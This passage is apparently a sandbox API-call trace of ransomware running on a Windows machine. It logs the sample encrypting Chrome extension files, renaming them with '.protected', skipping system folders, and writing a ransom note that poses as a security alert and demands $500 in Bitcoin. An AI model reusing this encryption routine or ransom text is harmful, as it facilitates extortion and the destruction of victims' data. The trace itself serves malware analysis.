HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.protected")) returned 1 [0080.112] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.112] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.112] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\RESTORE_FILES.txt") returned 159 [0080.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.112] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.112] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.113] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.113] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.113] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.113] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.114] CloseHandle (hObject=0x164) returned 1 [0080.114] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.114] lstrcmpiW (lpString1="lv", lpString2="Windows") returned -1 [0080.114] lstrcmpiW (lpString1="lv", lpString2="Program Files") returned -1 [0080.114] lstrcmpiW (lpString1="lv", lpString2="Program Files (x86)") returned -1 [0080.114] lstrcmpiW (lpString1="lv", lpString2="$Recycle.bin") returned 1 [0080.114] lstrcmpiW (lpString1="lv", lpString2="System Volume Information") returned -1 [0080.114] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv") returned 141 [0080.114] lstrcmpW (lpString1="lv", lpString2=".") returned 1 [0080.114] lstrcmpW (lpString1="lv", lpString2="..") returned 1 [0080.114] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\*") returned 143 [0080.114] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.114] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.114] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.114] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.114] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.114] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.114] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\.") returned 143 [0080.114] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.114] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.114] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.114] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.114] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.114] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.114] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.114] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\..") returned 144 [0080.114] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.114] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.114] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.115] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.115] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.115] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.115] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.115] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.115] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json") returned 155 [0080.115] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.115] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.115] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.115] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.115] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json") returned 155 [0080.115] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.115] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json") returned 155 [0080.115] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.115] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json") returned 155 [0080.115] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.115] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe5, lpOverlapped=0x0) returned 1 [0080.116] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.116] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe5, lpOverlapped=0x0) returned 1 [0080.116] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.116] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.116] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.116] CloseHandle (hObject=0x168) returned 1 [0080.116] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.protected") returned 165 [0080.116] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\messages.json.protected")) returned 1 [0080.117] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.117] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.117] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\RESTORE_FILES.txt") returned 159 [0080.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.117] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.117] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.118] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.118] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.118] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.118] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.118] CloseHandle (hObject=0x164) returned 1 [0080.118] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.118] lstrcmpiW (lpString1="ms", lpString2="Windows") returned -1 [0080.118] lstrcmpiW (lpString1="ms", lpString2="Program Files") returned -1 [0080.118] lstrcmpiW (lpString1="ms", lpString2="Program Files (x86)") returned -1 [0080.118] lstrcmpiW (lpString1="ms", lpString2="$Recycle.bin") returned 1 [0080.118] lstrcmpiW (lpString1="ms", lpString2="System Volume Information") returned -1 [0080.118] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms") returned 141 [0080.118] lstrcmpW (lpString1="ms", lpString2=".") returned 1 [0080.119] lstrcmpW (lpString1="ms", lpString2="..") returned 1 [0080.119] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\*") returned 143 [0080.119] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.119] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.119] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.119] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.119] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.119] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.119] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\.") returned 143 [0080.119] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.119] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.119] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.119] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.119] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.119] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.119] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.119] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\..") returned 144 [0080.119] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.119] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.119] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.119] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.119] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.119] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.119] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.119] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.119] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json") returned 155 [0080.119] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.119] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.119] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.119] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.119] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.120] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json") returned 155 [0080.120] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.120] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json") returned 155 [0080.120] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.120] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json") returned 155 [0080.120] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.120] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd0, lpOverlapped=0x0) returned 1 [0080.121] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.121] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd0, lpOverlapped=0x0) returned 1 [0080.121] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.121] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.121] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.121] CloseHandle (hObject=0x168) returned 1 [0080.122] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.protected") returned 165 [0080.122] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 